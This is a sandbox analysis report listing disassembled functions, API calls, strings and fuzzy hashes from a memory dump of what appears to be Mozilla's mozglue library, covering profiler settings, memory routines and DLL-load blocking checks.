                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                  • String ID: 3JT/
                                                                  • API String ID: 304294125-2178588373
                                                                  • Opcode ID: d6838edaf1555250e48c5effedc3cd54f1d85b7b8174db74283a6d2410b9d9aa
                                                                  • Instruction ID: ab40ccb5eb13e11257c25beb48f989c2691dae701f84f833203e2bbf362db9c1
                                                                  • Opcode Fuzzy Hash: d6838edaf1555250e48c5effedc3cd54f1d85b7b8174db74283a6d2410b9d9aa
                                                                  • Instruction Fuzzy Hash: 7DF0AFB0A8420CAFEF01DAA1CCC4BEEB7FC9B04319F105129E911726C0D775A6C8C661
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C0C86AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                  • Instruction ID: 798baf6d00739cbc6b3cec39dc2b513bc49b9be485aa7342dc03cbd460092d0f
                                                                  • Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                  • Instruction Fuzzy Hash: 5AC1B476A0111A8FCB14CF68CC90BEDB7F6EF89314F1502A9C949EB785D730A985CB91
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C0C8A4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction ID: 50108fbf530dd173e3647efafce238dc2cdce5e2ba0528a3515b38f8e740b14c
                                                                  • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction Fuzzy Hash: EEB1E576B0121A8FDB14CF68CC91BADB7F2EF85314F1802A9C549EB781D730A985CB91
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C0C88F0
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C0C925C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction ID: 8df3cb074f3bb332c9581d39c82b7c52c278d04f4c5a7274f6a9cc3485a51c98
                                                                  • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction Fuzzy Hash: 1FB1C576F0520A8BCB14CF58CC81BADB7F6EF84314F180269C949EB785D734A989CB91
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C0C8E18
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C0C925C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                  • Instruction ID: d4654c6f1ce243991b9ad30f8464efaa928146ad7dfb062084d1b3388697dad0
                                                                  • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                  • Instruction Fuzzy Hash: 10A1D676B001168FCB14CF68CC80B9DB7F6AF95314F1502B9C949EB785D730A999CB91
                                                                  APIs
                                                                  • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0603D4,?), ref: 6C0BB955
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C0BB9A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryQueryVirtualrand_s
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1889792194-2178588373
                                                                  • Opcode ID: bd67d8c35aaa17eb5582254e991dbeb2f6a126ba39e3713b270ea24bcf5f8d77
                                                                  • Instruction ID: e16bc8dc8966737c6432a19376f10463020b5442be166964df66a258fb3024e1
                                                                  • Opcode Fuzzy Hash: bd67d8c35aaa17eb5582254e991dbeb2f6a126ba39e3713b270ea24bcf5f8d77
                                                                  • Instruction Fuzzy Hash: 0441A371F012199FDF04CFA9D890BDEB7F6EF88314F14812AE915A7744DB31A9458B90
                                                                  APIs
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C06582D), ref: 6C09CC27
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C06582D), ref: 6C09CC3D
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C0CFE98,?,?,?,?,?,6C06582D), ref: 6C09CC56
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C06582D), ref: 6C09CC6C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C06582D), ref: 6C09CC82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C06582D), ref: 6C09CC98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C06582D), ref: 6C09CCAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C09CCC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C09CCDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C09CCEC
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C09CCFE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C09CD14
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C09CD82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C09CD98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C09CDAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C09CDC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C09CDDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C09CDF0
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C09CE06
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C09CE1C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C09CE32
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C09CE48
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C09CE5E
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C09CE74
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C09CE8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: strcmp
                                                                  • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                  • API String ID: 1004003707-2809817890
                                                                  • Opcode ID: 2411bf8be1a9539ccb6475bab6e484a23442de5adffeaef86cd3b6edea2b191b
                                                                  • Instruction ID: b0e97fd604a820760b39a6c77096dda63505eca8aab97f0da3cdf813e0322317
                                                                  • Opcode Fuzzy Hash: 2411bf8be1a9539ccb6475bab6e484a23442de5adffeaef86cd3b6edea2b191b
                                                                  • Instruction Fuzzy Hash: 1B5186C1F4B26512FE0431157D20BAE14C9EF5324AF54603AED2EA2EA0FB15F70A56B7
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C064801
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C064817
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C06482D
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06484A
                                                                    • Part of subcall function 6C08AB3F: EnterCriticalSection.KERNEL32(6C0DE370,?,?,6C053527,6C0DF6CC,?,?,?,?,?,?,?,?,6C053284), ref: 6C08AB49
                                                                    • Part of subcall function 6C08AB3F: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C053527,6C0DF6CC,?,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08AB7C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C06485F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C06487E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C06488B
                                                                  • free.MOZGLUE(?), ref: 6C06493A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C064956
                                                                  • free.MOZGLUE(00000000), ref: 6C064960
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C06499A
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • free.MOZGLUE(?), ref: 6C0649C6
                                                                  • free.MOZGLUE(?), ref: 6C0649E9
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                  Strings
                                                                  • MOZ_PROFILER_SHUTDOWN, xrefs: 6C064A42
                                                                  • [I %d/%d] profiler_shutdown, xrefs: 6C064A06
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0647FC
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C064812
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C064828
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                  • API String ID: 1340022502-4194431170
                                                                  • Opcode ID: 0866166be4e3553ae4212d5a86baa3889a8d0a6b4cfcb83ba1fe8885816f439a
                                                                  • Instruction ID: 20b81d2a24b64ea5d3168fcb07423103642a4f65c4f6e44031a76d2c34a72010
                                                                  • Opcode Fuzzy Hash: 0866166be4e3553ae4212d5a86baa3889a8d0a6b4cfcb83ba1fe8885816f439a
                                                                  • Instruction Fuzzy Hash: 7381F571A00200AFDB14DFAAC8A475E37F5AF42329F544229ED1697F41DB31F944CBAA
                                                                  APIs
                                                                    • Part of subcall function 6C064730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0644B2,6C0DE21C,6C0DF7F8), ref: 6C06473E
                                                                    • Part of subcall function 6C064730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C06474A
                                                                  • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0644BA
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0644D2
                                                                  • InitOnceExecuteOnce.KERNEL32(6C0DF80C,6C05F240,?,?), ref: 6C06451A
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C06455C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 6C064592
                                                                  • InitializeCriticalSection.KERNEL32(6C0DF770), ref: 6C0645A2
                                                                  • moz_xmalloc.MOZGLUE(00000008), ref: 6C0645AA
                                                                  • moz_xmalloc.MOZGLUE(00000018), ref: 6C0645BB
                                                                  • InitOnceExecuteOnce.KERNEL32(6C0DF818,6C05F240,?,?), ref: 6C064612
                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C064636
                                                                  • LoadLibraryW.KERNEL32(user32.dll), ref: 6C064644
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C06466D
                                                                  • VerSetConditionMask.NTDLL ref: 6C06469F
                                                                  • VerSetConditionMask.NTDLL ref: 6C0646AB
                                                                  • VerSetConditionMask.NTDLL ref: 6C0646B2
                                                                  • VerSetConditionMask.NTDLL ref: 6C0646B9
                                                                  • VerSetConditionMask.NTDLL ref: 6C0646C0
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0646CD
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C0646F1
                                                                  • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0646FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                  • String ID: Gl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll$3JT/
                                                                  • API String ID: 1702738223-2751348851
                                                                  • Opcode ID: 6eb12b0797c21c971f771777804299c3c520fec6cc4f1292076e4a299f9eb432
                                                                  • Instruction ID: 5a42ea5093d68c6ae2d056b927aab863cd9f1b19307a0ffc6b05b0bb89700e9f
                                                                  • Opcode Fuzzy Hash: 6eb12b0797c21c971f771777804299c3c520fec6cc4f1292076e4a299f9eb432
                                                                  • Instruction Fuzzy Hash: D961C4B0604344AFEB10DFA1C849B957BFCEF46308F05C559E9089BA51DBB0AA85CF52
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF760), ref: 6C0619BD
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C0619E5
                                                                  • GetLastError.KERNEL32 ref: 6C061A27
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C061A41
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C061A4F
                                                                  • GetLastError.KERNEL32 ref: 6C061A92
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C061AAC
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C061ABA
                                                                  • LocalFree.KERNEL32(?), ref: 6C061C69
                                                                  • free.MOZGLUE(?), ref: 6C061C8F
                                                                  • free.MOZGLUE(?), ref: 6C061C9D
                                                                  • CloseHandle.KERNEL32(?), ref: 6C061CAE
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF760), ref: 6C061D52
                                                                  • GetLastError.KERNEL32 ref: 6C061DA5
                                                                  • GetLastError.KERNEL32 ref: 6C061DFB
                                                                  • GetLastError.KERNEL32 ref: 6C061E49
                                                                  • GetLastError.KERNEL32 ref: 6C061E68
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C061E9B
                                                                    • Part of subcall function 6C062070: LoadLibraryW.KERNEL32(combase.dll,6C061C5F), ref: 6C0620AE
                                                                    • Part of subcall function 6C062070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0620CD
                                                                    • Part of subcall function 6C062070: __Init_thread_footer.LIBCMT ref: 6C0620E1
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C061F15
                                                                  • VerSetConditionMask.NTDLL ref: 6C061F46
                                                                  • VerSetConditionMask.NTDLL ref: 6C061F52
                                                                  • VerSetConditionMask.NTDLL ref: 6C061F59
                                                                  • VerSetConditionMask.NTDLL ref: 6C061F60
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C061F6D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                  • String ID: D$3JT/
                                                                  • API String ID: 290179723-83717026
                                                                  • Opcode ID: 611c3989ca3935823b54fec861d230601c31edc35bdf4d3f92bc2272d566b531
                                                                  • Instruction ID: e4b6d8a2bbda5f98e5ebe84596dc58408d7bcb1e195212dda722de0aa57c50e3
                                                                  • Opcode Fuzzy Hash: 611c3989ca3935823b54fec861d230601c31edc35bdf4d3f92bc2272d566b531
                                                                  • Instruction Fuzzy Hash: B9F16171A04315AFEB209F66CC48BAAB7F4FF49714F104159E905A7A40DB74EE80CF91
                                                                  APIs
                                                                  • strchr.VCRUNTIME140(00000000,0000002E), ref: 6C07BC5A
                                                                  • strchr.VCRUNTIME140(00000001,0000002E), ref: 6C07BC6E
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6C07BC9E
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C07BE33
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BE65
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BE71
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BE7D
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BE89
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C07BE97
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C07BEE4
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BF15
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BF21
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BF2D
                                                                  • VerSetConditionMask.NTDLL ref: 6C07BF39
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C07BF47
                                                                    • Part of subcall function 6C0BAAE0: GetCurrentThreadId.KERNEL32 ref: 6C0BAAF8
                                                                    • Part of subcall function 6C0BAAE0: EnterCriticalSection.KERNEL32(6C0DF770,?,6C07BF9F), ref: 6C0BAB08
                                                                    • Part of subcall function 6C0BAAE0: LeaveCriticalSection.KERNEL32(6C0DF770,?,?,?,?,?,?,?,?,6C07BF9F), ref: 6C0BAB6B
                                                                  • free.MOZGLUE(00000000), ref: 6C07BFF0
                                                                  • _strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6C07C014
                                                                    • Part of subcall function 6C0BAC20: CreateFileW.KERNEL32 ref: 6C0BAC52
                                                                    • Part of subcall function 6C0BAC20: CreateFileMappingW.KERNEL32 ref: 6C0BAC7D
                                                                    • Part of subcall function 6C0BAC20: GetSystemInfo.KERNEL32 ref: 6C0BAC98
                                                                    • Part of subcall function 6C0BAC20: MapViewOfFile.KERNEL32 ref: 6C0BACB0
                                                                    • Part of subcall function 6C0BAC20: GetSystemInfo.KERNEL32 ref: 6C0BACCD
                                                                    • Part of subcall function 6C0BAC20: MapViewOfFile.KERNEL32 ref: 6C0BAD05
                                                                    • Part of subcall function 6C0BAC20: UnmapViewOfFile.KERNEL32 ref: 6C0BAD1C
                                                                    • Part of subcall function 6C0BAC20: CloseHandle.KERNEL32 ref: 6C0BAD28
                                                                    • Part of subcall function 6C0BAC20: UnmapViewOfFile.KERNEL32 ref: 6C0BAD37
                                                                    • Part of subcall function 6C0BAC20: CloseHandle.KERNEL32 ref: 6C0BAD43
                                                                    • Part of subcall function 6C0BAE70: GetCurrentThreadId.KERNEL32 ref: 6C0BAE85
                                                                    • Part of subcall function 6C0BAE70: EnterCriticalSection.KERNEL32(6C0DF770,?,6C07C034), ref: 6C0BAE96
                                                                    • Part of subcall function 6C0BAE70: LeaveCriticalSection.KERNEL32(6C0DF770,?,?,?,?,6C07C034), ref: 6C0BAEBD
                                                                  Strings
                                                                  • LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6C07BFCF
                                                                  • 3JT/, xrefs: 6C07BB92
                                                                  • LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6C07BF5B
                                                                  • accelerator.dll, xrefs: 6C07BC8E, 6C07BC9D
                                                                  • LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6C07BDDD
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
